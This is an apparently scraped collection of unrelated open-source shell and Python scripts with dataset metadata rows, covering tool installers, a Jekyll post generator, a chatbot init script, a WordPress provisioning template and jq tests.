FILE_NAME="pandoc-${LATEST_VERSION}-linux-${PLATFORM}.tar.gz"
DOWNLOAD_URL="${BASE_RELEASE_URL}download/${LATEST_VERSION}/${FILE_NAME}"
echo "download url: ${DOWNLOAD_URL}" | tee -a "${LOG_PATH}"
# /tmpディレクトリにワークディレクトリを用意する
# ワークディレクトリはwgetコマンドが作成する
WORK_DIR="/tmp/pandoc-${LATEST_VERSION}"
DOWNLOAD_PATH="${WORK_DIR}/${FILE_NAME}"
# ファイルをダウンロード
mkdir -p "${WORK_DIR}"
wget --no-verbose "${DOWNLOAD_URL}" -O ${DOWNLOAD_PATH} 2>> "${LOG_PATH}"
WGET_EXIT_CODE=$?
if [ $WGET_EXIT_CODE -ne 0 ]; then
echo "faield to download ${DOWNLOAD_URL}" | tee -a "${LOG_PATH}"
echo "see ${LOG_PATH}"
exit 1
fi
# tar.gzを解凍
tar zxf "${DOWNLOAD_PATH}" -C "$WORK_DIR"
# tar.gzを解凍するとpandoc-${LATEST_VERSION}ディレクトリが作られる
# その配下にはbinディレクトリとshareディレクトリがある
BIN_DIR_PATH="${WORK_DIR}/pandoc-${LATEST_VERSION}/bin"
SHARE_DIR_PATH="${WORK_DIR}/pandoc-${LATEST_VERSION}/share"
# binディレクトリとshareディレクトリを$HOME/.localにコピー
DESTINATION_DIR_PATH="${HOME}/.local"
mkdir -p "${DESTINATION_DIR_PATH}"
echo "copy ${BIN_DIR_PATH} to ${DESTINATION_DIR_PATH}" | tee -a "${LOG_PATH}"
cp -r "${BIN_DIR_PATH}" "${DESTINATION_DIR_PATH}" 2>&1 | tee -a "${LOG_PATH}"
BIN_COPY_EXIT_CODE=$?
echo "copy ${SHARE_DIR_PATH} to ${DESTINATION_DIR_PATH}" | tee -a "${LOG_PATH}"
cp -r "${SHARE_DIR_PATH}" "${DESTINATION_DIR_PATH}" 2>&1 | tee -a "${LOG_PATH}"
SHARE_COPY_EXIT_CODE=$?
if [ $BIN_COPY_EXIT_CODE -eq 0 -a $SHARE_COPY_EXIT_CODE -eq 0 ]; then
echo "pandoc path: `command -v pandoc`"
exit 0
else
echo "failed to copy ${BIN_DIR_PATH} or ${SHARE_DIR_PATH} to ${DESTINATION_PATH}" | tee -a "${LOG_PATH}"
echo "see ${LOG_PATH}"
exit 1
fi
| true |
4173b6ac62894084a0ca17a1572af14306d5cecb | Shell | dhivakar08/Linux-Study | /Shell-Scripts/02.Print.sh | UTF-8 | 1,823 | 3.171875 | 3 | [] | no_license | ## Color Code (\e)
#echo -e "\e[COL-CODEmMessage"
# Colors are two types
## Color ForegroundColor BackgroundColor
# Red 31 41
# Green 32 42
# Yello 33 43
# Blue 34 44
# Magenta 35 45
# Cyan 36 46
echo -e "\e[31mHello World in Red Color"
echo -e "\e[43mYellow Background Content"
# Observations:
# Color gets followed.
# red color is available on yellow background text
# yellow back background is available to next lines as well.
## Note: When you enable color and after the text , We need to disable the color.
# Disabling color code is 0
## Reset the color
echo -e "\e[0m"
echo -e "\e[31mHello World in Red Color\e[0m"
echo -e "\e[43mYellow Background Content\e[0m"
## Combine both forground and background colors.
echo -e "\e[31;42m Hello World \e[0m"
## Tasks for practice
# 1. Make a text with all the color combinations, Every word ont he below line should be a different color, Adjecent two words cannot have same color.
# The number of positive novel coronavirus cases in India surged to 830 on Friday, the third day of the 21-day lockdown imposed to combat the Covid-19 outbreak, while the death toll rose to 20. Almost 100 new cases were reported across India after the health ministry on Friday morning said that the total number of cases stood at 724.
#-------------------------------------------------
#Changing image terminal prompt color
# cat /etc/profile.d/ps1.sh
# echo $PS1
# PS1=[\u@\h \w] ---- \u username \h hoatname \w basename of current working dir
| true |
777d12aa94e0e77c463ea0d9a449bb13600a30aa | Shell | breunigs/bravia-auth-and-remote | /example_goto_media_player.sh | UTF-8 | 860 | 3.546875 | 4 | [
"ISC"
] | permissive | #!/bin/bash
set -e
cd $(dirname $0)
if [ "$1" = "" ]; then
echo "Usage: $0 <TV_IP>"
exit 1
fi
if ! [ -e 'auth_cookie' ]; then
echo 'auth_cookie not found. Run ./auth.sh first.'
exit 1
fi
declare -A commandmap
commandmap[DIGITAL]="AAAAAgAAAJcAAAAyAw=="
commandmap[EXIT]="AAAAAQAAAAEAAABjAw=="
commandmap[HOME]="AAAAAQAAAAEAAABgAw=="
commandmap[DOWN]="AAAAAQAAAAEAAAB1Aw=="
commandmap[UP]="AAAAAQAAAAEAAAB0Aw=="
commandmap[LEFT]="AAAAAQAAAAEAAAA0Aw=="
commandmap[CONFIRM]="AAAAAQAAAAEAAABlAw=="
commandmap[ENTER]="AAAAAQAAAAEAAAALAw=="
tv_ip=$1
remote() {
echo -n "$1: "
./send_command.sh $tv_ip ${commandmap[$1]}
}
# get into known state
remote 'DIGITAL'
sleep 4
echo 'Waiting for TV to boot fully…'
sleep 30
remote 'HOME'
sleep 6
# select 'media player in lower left corner'
remote 'DOWN'
remote 'DOWN'
remote 'LEFT'
remote 'CONFIRM'
| true |
535e7412d935ccd72ed059a94eae5ea9141f8230 | Shell | ducklingcloud/clb | /clb-server/scripts/pdfexport-install.sh | UTF-8 | 692 | 3.40625 | 3 | [] | no_license |
#!/bin/bash
PX_HOME=/usr/local/pdfexport
if [ -d ${PX_HOME} ]
then
echo "${PX_HOME} is already existed."
else
echo "Create ${PX_HOME}"
mkdir -p ${PX_HOME}
fi
cd ${PX_HOME}
rm -rf *
wget ftp://ftp.cerc.cnic.cn/incoming/liji/apps/pdfexport.x64.tar.gz
tar zxvf pdfexport.x64.tar.gz
cd pdfexport
mv * ../
cd ../
rm -rf pdfexport pdfexport.x64.tar.gz
if [ -z "$LD_LIBRARY_PATH" ]
then
etc_profile=/etc/profile
echo "export LD_LIBRARY_PATH=${PX_HOME}/lib" >> $etc_profile
echo "LD_LIBRARY_PATH now is initialized, you need to run [source /etc/profile]"
else
echo "LD_LIBRARY_PATH is already existed"
fi
yum -y install compat-libstdc++-33.x86_64
| true |
e5d1e6fda183a845df72c8bb8cece63c2e565958 | Shell | bval/jarvis | /bin/init-script | UTF-8 | 4,709 | 3.421875 | 3 | [] | no_license | #! /bin/sh
### BEGIN INIT INFO
# Provides: jarvis
# Required-Start: $ejabberd $ircd-hybrid $syslog
# Required-Stop: $ejabberd $ircd-hybrid $syslog
# Default-Start: 2 3 4 5
# Default-Stop: 1
# Short-Description: XMPP / IRC chatbots
### END INIT INFO
set -e
# /etc/init.d/jarvis: start and stop the xmpp / irc chatbots
protect_default_file(){
if [ ! -z "${DEFAULT_FILE}" ]; then
if [ -f "${DEFAULT_FILE}" ]; then
if [ "$(stat -c '%U:%G' /etc/default/jarvis)" != "root:root" ]; then
chown root:root "${DEFAULT_FILE}"
fi
if [ "$(stat -c '%A' /etc/default/jarvis)" != "-r--------" ]; then
chmod 0400 "${DEFAULT_FILE}"
fi
fi
fi
}
export DEFAULT_FILE="/etc/default/jarvis";
protect_default_file
if test -f ${DEFAULT_FILE}; then
. ${DEFAULT_FILE}
fi
. /lib/lsb/init-functions
# Are we running from init?
run_by_init() {
([ "$previous" ] && [ "$runlevel" ]) || [ "$runlevel" = S ]
}
git_revision(){
if [ -z ${GIT_ENABLED} ]; then
echo 0
return -1
fi
if [ ${GIT_ENABLED} -ne 1 ]; then
echo 0
return -1
fi
if [ ! -z "${GIT_ROOT}" -a ! -z "${GIT_REPO}" ]; then
echo $(cd ${GIT_REPO}; git log| head -1|awk '{print $2}')
fi
}
git_update(){
if [ -z ${GIT_ENABLED} ]; then return -1; fi
if [ -z ${GIT_ROOT} ]; then return -1 ;fi
if [ ! -d ${GIT_ROOT} ]; then
mkdir -p "${GIT_ROOT}"
fi
if [ -z ${GIT_REPO} ]; then return -1 ;fi
if [ ! -d ${GIT_REPO} ]; then
echo "GIT_REPO DOES NOT EXIST"
if [ ! -z "${GIT_SOURCE}" ]; then
(cd "${GIT_ROOT}"; git clone "${GIT_SOURCE}")
else
echo "GIT_SOURCE NOT DEFINED CANNOT CREATE GIT_REPO"
return -1;
fi
else
(cd ${GIT_REPO}; git pull origin master)
fi
# This is a temporary hack until the init script is stable:
NOW=$(md5sum /etc/init.d/jarvis|awk '{print $2}')
NEW=$(md5sum ${GIT_REPO}/bin/init-script|awk '{print $2}')
if [ "${NOW}" != "${NEW}" ];then
install -m 0744 ${GIT_REPO}/bin/init-script /etc/init.d/jarvis
fi
}
git_rollback(){
if [ -z ${GIT_ENABLED}]; then
return -1
fi
}
export PATH="${PATH:+$PATH:}/usr/sbin:/sbin"
if [ -z "${PID_FILE}" ]; then
export PID_FILE="/var/run/jarvis.pid"
fi
if [ -z "${RUN_AS}" ]; then
export RUN_AS='root'
fi
if [ -z "${LOG_NAME}" ]; then
export LOG_NAME='XMPP / IRC chatbot daemon'
fi
if [ -z "${DAEMON_NAME}" ]; then
export DAEMON_NAME='universal.pl'
fi
if [ -z "${LOG_FILE}" ]; then
export LOG_FILE='/dev/null'
fi
case "$1" in
start)
log_daemon_msg "Starting ${LOG_NAME}" "${DAEMON_NAME}"
protect_default_file
git_update
export GIT_REVISION=$(git_revision)
if [ ! -f "${PID_FILE}" ]; then
PID_DIR=$(dirname $PID_FILE)
if [ ! -d ${PID_DIR} ] ;then mkdir -p ${PID_DIR}; fi
touch ${PID_FILE}
chown ${RUN_AS} ${PID_FILE}
fi
COUNT=$(ps -ef | grep "${GIT_REPO}/uni[v]ersal" | awk -v runas="${RUN_AS}" '{if($1==runas){print $2}}'|wc -l)
if [ ${COUNT} -eq 0 ]; then
start-stop-daemon --start --quiet --oknodo \
--pidfile ${PID_FILE} \
--chdir ${GIT_REPO} \
--chuid ${RUN_AS} \
--exec ${GIT_REPO}/universal.pl -- >> ${LOG_FILE} 2>&1 &
SSD_EXIT=$?
echo $! > ${PID_FILE}
if [ ${SSD_EXIT} ]; then
log_end_msg 0
else
log_end_msg 1
fi
else
echo "${GIT_REPO}/uni[v]ersal already running"
exit -1
fi
;;
stop)
log_daemon_msg "Stopping ${LOG_NAME}" "${DAEMON_NAME}"
if start-stop-daemon --stop --quiet --oknodo --pidfile ${PID_FILE}; then
log_end_msg 0
else
log_end_msg 1
fi
for proc in $(ps -ef | grep "${GIT_REPO}/uni[v]ersal" | awk -v runas="${RUN_AS}" '{if($1==runas){print $2}}');do
kill -9 ${proc}
done
;;
reload|force-reload)
log_daemon_msg "Reloading ${LOG_NAME}" "${DAEMON_NAME}"
if start-stop-daemon --stop --signal 1 --quiet --oknodo --pidfile ${PID_FILE} --chdir ${GIT_REPO} --chuid ${RUN_AS} --exec ${GIT_REPO}/universal.pl; then
log_end_msg 0
else
log_end_msg 1
fi
;;
restart)
log_daemon_msg "Restarting ${LOG_NAME}" "${DAEMON_NAME}"
$0 stop
$0 start
;;
status)
status_of_proc -p ${PID_FILE} universal.pl && exit 0 || exit $?
;;
*)
log_action_msg "Usage: /etc/init.d/jarvis {start|stop|reload|force-reload|restart|status}"
exit 1
esac
exit 0
| true |
453922232101a86e4daf0b40ecb1bb1202c06895 | Shell | cupkes/psim01 | /scripts/init_logging.sh | UTF-8 | 824 | 3.53125 | 4 | [] | no_license | #!/bin/bash -e
#
# Script for initializing logging
##################################################
cd /
mkdir /opt/stratatron
mkdir /opt/stratatron/etc
mkdir /opt/stratatron/bin
chmod 777 /opt/stratatron/etc/
chmod 777 /opt/stratatron/bin/
mkdir /var/log/strata_logs
touch /var/log/strata_logs/init.log
cat <<ENDOC >>/etc/syslog.conf
# STRATATRON MODIFICATION
local5.debug /var/log/strata_logs/init.log
# END STRATATRON MODIFICATION
ENDOC
svcadm refresh system/system-log
# introduce wait code for refresh process
sleep 10
logger -p local5.debug stratatron
LOG =g$(grep stratatron /var/log/strata_logs/init.log/strata_logs)
LOGENTRY=${$LOG:?"Expected log entry missing."}
LOGVALUE=$(awk '{print $10} $LOGENTRY')
if [ $LOGVALUE == "stratatron" ]
then
echo "logging initialized"
else
echo "error initializing logging"
fi
| true |
5a7ce2aaf60f2a30cade1b93b5db9b85e49c9d1d | Shell | geraldstanje/rust_snippets | /c++_to_rust/build.sh | UTF-8 | 288 | 3.078125 | 3 | [
"MIT"
] | permissive | #!/bin/sh
all() {
rustc src/add.rs
rustc src/hello.rs
g++ -Wall -o main src/main.cpp -L $(pwd) -ladd -lhello -lSystem -lpthread -lc -lm
}
clean() {
rm libadd.a
rm libhello.a
rm main
}
case $1 in all|clean) "$1" ;; *) printf >&2 '%s: unknown command\n' "$1"; exit 1;; esac | true |
13a4f29b6a3f9edddc650956639656218e200469 | Shell | tothegump/LKI | /scripts/newblog | UTF-8 | 416 | 3.640625 | 4 | [] | no_license | #!/usr/bin/env bash
# make a new jekyll blog
set -e
if [[ $# -lt 1 ]]; then
echo "usage: newblog <some blog name>"
exit 1
fi
NAME=$1
FILENAME="`date '+%Y-%m-%d'`-$1.md"
if [[ -d "_posts" ]]; then
FILENAME="_posts/${FILENAME}"
fi
cat > ${FILENAME} <<EOF
---
layout: post
title: "${NAME}"
date: "`date '+%Y-%m-%d %H:%M:%S'`"
permalink: /${NAME}
---
${NAME}
<!--MORE-->
EOF
echo ${FILENAME}
| true |
00724a2705c1caace475a270114a0adc46ce03d0 | Shell | Hung040299/AppletServer | /assets/dodai/delete_collection.sh | UTF-8 | 531 | 3.625 | 4 | [] | no_license | #! /bin/bash -eu
# shellcheck shell=bash
source ./dodaiInfo.sh
usage() {
if [ $# -ne 1 ]; then
echo "${0} [dev|stg|prod] [collection_name]"
exit 1
fi
}
#$1 is collection name
deleteCollection() {
collection_name=$1
auth_head=Authorization:${gDodaiRootKey}
curl -X DELETE -H "${auth_head}" "${gDodaiBaseURL}collection/${collection_name}"
}
#$1 is [dev|stg|prod]
#$2 is [collection name]
main() {
if [ $# -ne 2 ]; then
usage
exit 1
fi
libSetTargetConfig "$1"
deleteCollection "$2"
}
main "$@"
| true |
9697f57e683cb17b74dc3e195097eacb47b31368 | Shell | kolyaiks/devops-school-aws-iac | /userData.tpl | UTF-8 | 1,845 | 3.078125 | 3 | [] | no_license | #!/bin/bash
#=== OS Update ======
yum update -y
#=== Install Apache Web Sever and MySQL =====
yum install httpd mysql -y
systemctl enable httpd
systemctl start httpd
#==== Install PHP and library to work with images =======
amazon-linux-extras install php7.2 -y
yum install -y php-gd -y
#=== Mounting EFS to local system's folder used by WP ===
mkdir /var/www/html/wp-content/
mount -t nfs -o nfsvers=4.1,rsize=1048576,wsize=1048576,hard,timeo=600,retrans=2,noresvport \
${efs_dns_name}:/ \
/var/www/html/wp-content/
#====== WordPress ========
curl -O https://raw.githubusercontent.com/wp-cli/builds/gh-pages/phar/wp-cli.phar
chmod +x wp-cli.phar
cp wp-cli.phar /usr/local/bin/wp && cp /usr/local/bin/wp /usr/bin/wp
wp cli update
wp core download --path=/var/www/html
chown -R apache:apache /var/www/html/*
cd /var/www/html
wp config create --dbname=${db_name} --dbuser=${db_user} \
--dbpass=${db_password} --dbhost=${db_host}
# in case of already existing database wp installation will fail
# with error "WordPress is already installed.", so we are not allowed
# to have wp database before creation it via command below
wp db create
wp core install --url=http://${alb_dns} --title=wp-${company_name} \
--admin_user=${wp_admin} --admin_password=${wp_password} --admin_email=${wp_admin_email}
#=== Customizing first WP post and saving image to EFS ====
wp post update 1 --path="/var/www/html" \
--post_title="Hello cloud" \
--post_content="This WordPress is spun up at AWS using Terraform by Nikolai Sergeev, 20th stream of DevOps School. <br> Reach out to me: <a href=\"https://www.niks.cloud/\">https://www.niks.cloud/</a>"
wp media import "https://www.niks.cloud/images/photo_2020-03-10_00-31-34.jpg" \
--post_id=1 --title="kolyaiks" --featured_image --path="/var/www/html"
#=== Restart Apache Web Sever ===
systemctl restart httpd
| true |
18617f09fee1a5b17879a01908e520cc2b00a783 | Shell | bbenne10/antigen-themes | /themes/bbennett2.zsh-theme | UTF-8 | 1,043 | 3.65625 | 4 | [
"MIT"
] | permissive | ZSH_THEME_GIT_PROMPT_PREFIX="─(%{$fg[cyan]%}"
ZSH_THEME_GIT_PROMPT_SUFFIX="%(?.%{$fg[green]%}.%{$fg[red]%}))"
ZSH_THEME_GIT_PROMPT_DIRTY="±"
function pyenv_prompt_info() {
local ver=$(pyenv version-name)
if [ -n "$ver" -a "$ver" != 'system' ]; then
echo "($ver)"
fi
}
function git_prompt_info() {
# original version of this didn't seem to work on OpenBSD. This should have
# the same functionality as upstream where it works, but also works on my
# OpenBSD install.
local ref
if [[ "$(command git config --get oh-my-zsh.hide-status 2>/dev/null)" != "1" ]]; then
ref=$(command git symbolic-ref HEAD 2> /dev/null) || ref=$(command git rev-parse --short HEAD 2> /dev/null)
if [ -z "$ref" ]; then
return 0
fi
echo "$ZSH_THEME_GIT_PROMPT_PREFIX${ref#refs/heads/}$(parse_git_dirty)$ZSH_THEME_GIT_PROMPT_SUFFIX"
fi
}
RPROMPT=$'\$(pyenv_prompt_info) %E%{$fg[magenta]%}%~%{$reset_color%}'
PROMPT="%(!.%{$fg[blue]%}(root).)%(?.%{$fg[green]%}.%{$fg[red]%})\$(git_prompt_info)─→%{$reset_color%} "
| true |
f8a99a0b74fb373157e629ccb9cab12a7e8daf2e | Shell | singledo/SortCode | /script/FileMove.py | UTF-8 | 2,776 | 3.078125 | 3 | [] | no_license | #!/bin/bash
#-*- coding=utf-8 -*-
import os
import sys
import shutil
import getopt
def Traver(path="", suffiexs=""):
if os.path.isdir(path) == False:
return None
filelist = []
suffiexsLen = len(suffiexs)
for root, dirs, files in os.walk(path, topdown=False):
for name in files:
if (name[len(name) - suffiexsLen : len(name)]) == suffiexs:
pass
else:
continue
filelist.append(root+'/'+name)
return filelist
def Copy(src="", dst="" , isOverWrite=True):
filelist = Traver(path=src, suffiexs=".md")
if os.path.exists(dst) == False:
os.makedirs(dst)
print("destnation direction not exits, we create it.")
else:
pass
print("#### Do copying")
if dst[-1] == "/":
dst = dst[0:len(dst)-1]
for file in filelist:
_list = file.split("/")
dstfile = dst+"/"+ _list[-1]
if os.path.exists(dstfile) == True:
print("{" + dstfile + "} is exits")
if isOverWrite == False:
print(" #### Skip ####")
continue
else:
os.remove(dstfile)
print(" ### Remove Write Done.")
if os.path.exists(file):
shutil.copyfile(file, dstfile)
print("{" + dstfile + "} Copy Done")
else:
print("source file is not exit")
def Run(argv=[]):
_len = len(argv)
if _len == 0:
print("Empty Input .....")
return
optlist = ""
remind = ""
try:
optlist, remind = (getopt.getopt(argv, "s:d:o:", [
'--source=',
'--destnation=',
'--OverWrite=',
]))
print(optlist, remind)
except getopt.GetoptError:
print("Argument Error ... ")
print("*.py -s sourcePath -d destnation -o True")
isOverWrite = True
destnation = ""
source = ""
for opt, arg in optlist:
if opt in ("-o", "--OverWrite"):
if arg == 'False' or arg == 'false':
isOverWrite = False
elif opt in ("-d", "--destnation"):
destnation = arg
elif opt in ("-s", "--souce"):
source = arg
if len(destnation) == 0 or len(source) == 0:
print("Enpty destnation or source path")
return
Copy(source, destnation, isOverWrite )
if __name__=="__main__":
print("Move File Script")
path = "/home/zz/workstation"
# Traver(path=path, suffiexs=".md")
# print(sys.argv[0], sys.argv[1], sys.argv[2])
# Copy(src=path, dst="./", suffiexs=".md")
str = "FileMove.py -s /home/zz/blog/source/_posts/ -d /home/zz/workstation/sort/markdown/ -o true"
_argv = []
Run(sys.argv[1:])
| true |
802e4c606947d756abcb3330805e5af7c8bbca03 | Shell | vantage-org/pg | /plugins/pg/run.sh | UTF-8 | 310 | 2.96875 | 3 | [
"MIT"
] | permissive | #!/bin/sh
# ---
# image:
# tag: "$VG_PG_TAG:$VG_PG_VERSION"
# network: $VG_DOCKER_NETWORK
# environment:
# - VG_PG_TAG=postgres
# - VG_PG_VERSION=latest
# - VG_DOCKER_NETWORK=vg_pg
# ---
if [ -n "$1" ] ; then
psql --dbname "$DATABASE_URL" --command "$1"
else
psql --dbname "$DATABASE_URL"
fi
| true |
bbaf96201297cad6d2934b7a9551631861050286 | Shell | gitoso/toso-arch-linux | /chroot-install.sh | UTF-8 | 2,692 | 3 | 3 | [
"MIT"
] | permissive | # === Import Env Variables ===
source /environment
rm /environment
# Time Zone
ln -sf /usr/share/zoneinfo/Brazil/East /etc/localtime
hwclock --systohc
# Localization
sed -i "s/#en_US.UTF-8/en_US.UTF-8/g" /etc/locale.gen
locale-gen
echo "LANG=en_US.UTF-8" >> /etc/locale.conf
echo "KEYMAP=$KEYBOARD_LAYOUT" >> /etc/vconsole.conf
# /etc/hostname
echo "$u_HOSTNAME" >> /etc/hostname
# /etc/hosts
echo "127.0.0.1 localhost" >> /etc/hosts
echo "::1 localhost" >> /etc/hosts
echo "127.0.1.1 $u_HOSTNAME.localdomain $u_HOSTNAME" >> /etc/hosts
# NetworkManager
pacman -S --noconfirm networkmanager nm-connection-editor network-manager-applet
systemctl enable NetworkManager.service
systemctl start NetworkManager.service
# Initramfs
mkinitcpio -P
# Root Password
echo "----------------"
echo "Password for ROOT"
passwd
# Micro-code
if [ "$cpu_type" == "intel" ]
then
pacman -S --noconfirm intel-ucode
elif [ "$cpu_type" == "amd" ]
then
pacman -S --noconfirm amd-ucode
fi
# Boot Loader (GRUB)
if [ "$use_efi" == "true" ]
then
pacman -S --noconfirm grub efibootmgr os-prober ntfs-3g
grub-install --target=x86_64-efi --efi-directory=/efi --bootloader-id=GRUB
grub-mkconfig -o /boot/grub/grub.cfg
else
pacman -S --noconfirm grub os-prober ntfs-3g
grub-install --target=i386-pc $grub_disk
grub-mkconfig -o /boot/grub/grub.cfg
fi
# User management
useradd -m -G adm,ftp,games,http,log,rfkill,sys,systemd-journal,uucp,wheel,lp $u_USERNAME
echo "----------------"
echo "Password for user $u_USERNAME"
passwd $u_USERNAME
# Enable multilib
sed -i '/#\[multilib\]/{N;s/\n#/\n/;P;D}' /etc/pacman.conf
sed -i "s/#\[multilib\]/\[multilib\]/g" /etc/pacman.conf
# Driver install
if [ "$gpu_type" == "intel" ]
then
pacman -Sy --noconfirm xf86-video-intel mesa lib32-mesa vulkan-intel lib32-vulkan-intel intel-media-driver libva-intel-driver
elif [ "$gpu_type" == "amd" ]
then
pacman -Sy --noconfirm xf86-video-amdgpu mesa lib32-mesa vulkan-radeon lib32-vulkan-radeon libva-mesa-driver lib32-libva-mesa-driver mesa-vdpau lib32-mesa-vdpau
elif [ "$gpu_type" == "nivida" ]
then
pacman -Sy --noconfirm xf86-video-nouveau mesa lib32-mesa
fi
# Sudo install & config
pacman -S --noconfirm sudo
echo "$u_USERNAME ALL=(ALL) ALL" >> /etc/sudoers
# Utilities install
pacman -S --noconfirm vim git
# Install Basic GUI (XOrg + i3-gaps)
if [ "$install_gui" == "true" ]
then
pacman -S --noconfirm xorg xorg-xinit i3 dmenu xdg-user-dirs
cp .xinitrc /home/$u_USERNAME/.xinitrc
chown $u_USERNAME /home/$u_USERNAME/.xinitrc
chgrp $u_USERNAME /home/$u_USERNAME/.xinitrc
fi
# End installation
exit | true |
2eee1bca8b9970ec6209f06a639c4aeef502b320 | Shell | ricardograca/gedit-themes | /install | UTF-8 | 3,028 | 4.09375 | 4 | [] | no_license | #!/bin/bash
#
# Copyright (C) 2012 Ricardo Graça
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
# Notes:
#
# - This script was only tested on:
# - Ubuntu 12.04 with Gedit 3.4
# - Ubuntu 16.04 with Gedit 3.18.3
# - Red Hat Enterprise Linux 6.7 with 2.28.4
# but it should work in other linux distros as well.
# default install dirs: LOCAL (in home dir) && NEW (3.x version)
LOCAL=1
LATEST=1
INSTALL_DIR_LOCAL_LATEST="$HOME/.local/share/gtksourceview-3.0/styles"
INSTALL_DIR_GLOBAL_LATEST="/usr/share/gtksourceview-3.0/styles"
INSTALL_DIR_LOCAL_2X="$HOME/.gnome2/gedit/styles"
INSTALL_DIR_GLOBAL_2X="/usr/share/gtksourceview-2.0/styles"
INSTALL_DIR="" # set in evaldir
# Print usage instructions of the script
function usage {
cat << EOF
usage: $0 [options]
This script installs the bundled theme styles for gedit.
OPTIONS:
-h Shows this message
-a Install for all users
-o Old version support (Gedit 2.x version)
EOF
}
# Check if destination directory exists and create it if it doesn't.
# Will return an error code if anything fails, stopping the script execution.
function chkdir {
if [ ! -d "$INSTALL_DIR" ]; then
if [[ $INSTALL_DIR = /usr/* ]]; then
sudo mkdir -p "$INSTALL_DIR" || { return 1; }
else
mkdir -p "$INSTALL_DIR" || { return 1; }
fi
fi
return 0
}
# Copy theme files to destination directory
function cpfiles {
if [[ $INSTALL_DIR = /usr/* ]]; then
sudo cp *.xml "$INSTALL_DIR" || { return 1; }
else
cp *.xml "$INSTALL_DIR" || { return 1; }
fi
return 0
}
function evaldir {
if [[ $LOCAL -eq 1 ]]; then
if [[ $LATEST -eq 1 ]]; then
INSTALL_DIR="$INSTALL_DIR_LOCAL_LATEST";
else
INSTALL_DIR="$INSTALL_DIR_LOCAL_2X";
fi
else
if [[ $LATEST -eq 1 ]]; then
INSTALL_DIR="$INSTALL_DIR_GLOBAL_LATEST";
else
INSTALL_DIR="$INSTALL_DIR_GLOBAL_2X";
fi
fi
}
# Loop through passed arguments
while getopts "hao" OPTION; do
case $OPTION in
h)
usage
exit 1
;;
a)
LOCAL=0
;;
o)
LATEST=0
;;
esac
done
evaldir
echo -e "Installing Gedit themes to $INSTALL_DIR\n..."
chkdir
SUCCESS=$?
if [ $SUCCESS -eq 0 ]; then
cpfiles
if [ $? -eq 0 ]; then
echo -e "...\nAll done!\n:)"
exit 0
else
echo -e "Unable to copy themes to $INSTALL_DIR\n:("
exit 1
fi
else
echo -e "The destination directory $INSTALL_DIR doesn't exist and I can't create it either!\n:("
exit 1
fi
| true |
e0c8376091e1d5bc0f354405d7f8dafb3be9cbbf | Shell | glennj/exercism.io | /jq/vehicle-purchase/test-vehicle-purchase.bats | UTF-8 | 2,915 | 2.515625 | 3 | [] | no_license | #!/usr/bin/env bats
load bats-extra
@test requires_a_license_for_a_car {
## task 1
run jq -R 'include "vehicle-purchase"; needs_license' <<< 'car'
assert_success
assert_output "true"
}
@test requires_a_license_for_a_truck {
## task 1
run jq -R 'include "vehicle-purchase"; needs_license' <<< 'truck'
assert_success
assert_output "true"
}
@test does_not_require_a_license_for_a_bike {
## task 1
run jq -R 'include "vehicle-purchase"; needs_license' <<< 'bike'
assert_success
assert_output "false"
}
@test does_not_require_a_license_for_a_stroller {
## task 1
run jq -R 'include "vehicle-purchase"; needs_license' <<< 'stroller'
assert_success
assert_output "false"
}
@test does_not_require_a_license_for_an_e-scooter {
## task 1
run jq -R 'include "vehicle-purchase"; needs_license' <<< 'e-scooter'
assert_success
assert_output "false"
}
@test correctly_recommends_the_first_option {
## task 2
run jq -r 'include "vehicle-purchase"; choose_vehicle' << END_INPUT
["Bugatti Veyron", "Ford Pinto"]
["Chery EQ", "Kia Niro Elektro"]
END_INPUT
assert_success
assert_line --index 0 'Bugatti Veyron is clearly the better choice.'
assert_line --index 1 'Chery EQ is clearly the better choice.'
}
@test correctly_recommends_the_second_option {
## task 2
run jq -r 'include "vehicle-purchase"; choose_vehicle' << END_INPUT
["Ford Pinto", "Bugatti Veyron"]
["2020 Gazelle Medeo", "2018 Bergamont City"]
END_INPUT
assert_success
assert_line --index 0 'Bugatti Veyron is clearly the better choice.'
assert_line --index 1 '2018 Bergamont City is clearly the better choice.'
}
@test price_is_reduced_to_80%_for_age_below_3 {
## task 3
run jq 'include "vehicle-purchase"; resell_price' << END_INPUT
{"original_price": 40000, "age": 2}
{"original_price": 40000, "age": 2.5}
END_INPUT
assert_success
assert_line --index 0 '32000'
assert_line --index 1 '32000'
}
@test price_is_reduced_to_50%_for_age_above_10 {
## task 3
run jq 'include "vehicle-purchase"; resell_price' << END_INPUT
{"original_price": 40000, "age": 12}
END_INPUT
assert_success
assert_output '20000'
}
@test price_is_reduced_to_70%_for_between_3_and_10 {
## task 3
run jq 'include "vehicle-purchase"; resell_price' << END_INPUT
{"original_price": 25000, "age": 7}
END_INPUT
assert_success
assert_output '17500'
}
@test works_correctly_for_threshold_age_3 {
## task 3
run jq 'include "vehicle-purchase"; resell_price' << END_INPUT
{"original_price": 40000, "age": 3}
END_INPUT
assert_success
assert_output '28000'
}
@test works_correctly_for_threshold_age_10 {
## task 3
run jq 'include "vehicle-purchase"; resell_price' << END_INPUT
{"original_price": 25000, "age": 10}
END_INPUT
assert_success
assert_output '17500'
}
| true |
4a977bca6befd93ac1c3e7f068cc326aebd907d5 | Shell | vuminhkh/tosca-runtime | /cli/src/main/resources/bin/tosca-runtime.sh | UTF-8 | 433 | 2.8125 | 3 | [
"MIT"
] | permissive | #!/usr/bin/env bash
SCRIPT_DIR="$( cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd )"
BASE_DIR="$(dirname "$SCRIPT_DIR")"
echo "Setting tosca runtime base dir to ${BASE_DIR}"
TOSCA_RUNTIME_OPTS="-Xms512M -Xmx1536M -Xss1M -XX:+CMSClassUnloadingEnabled -Dtoscaruntime.clientMode=true -Dtoscaruntime.basedir=${BASE_DIR} ${TOSCA_RUNTIME_OPTS}"
java ${TOSCA_RUNTIME_OPTS} -jar $SCRIPT_DIR/sbt-launch.jar "@${BASE_DIR}/conf/launchConfig" "$@" | true |
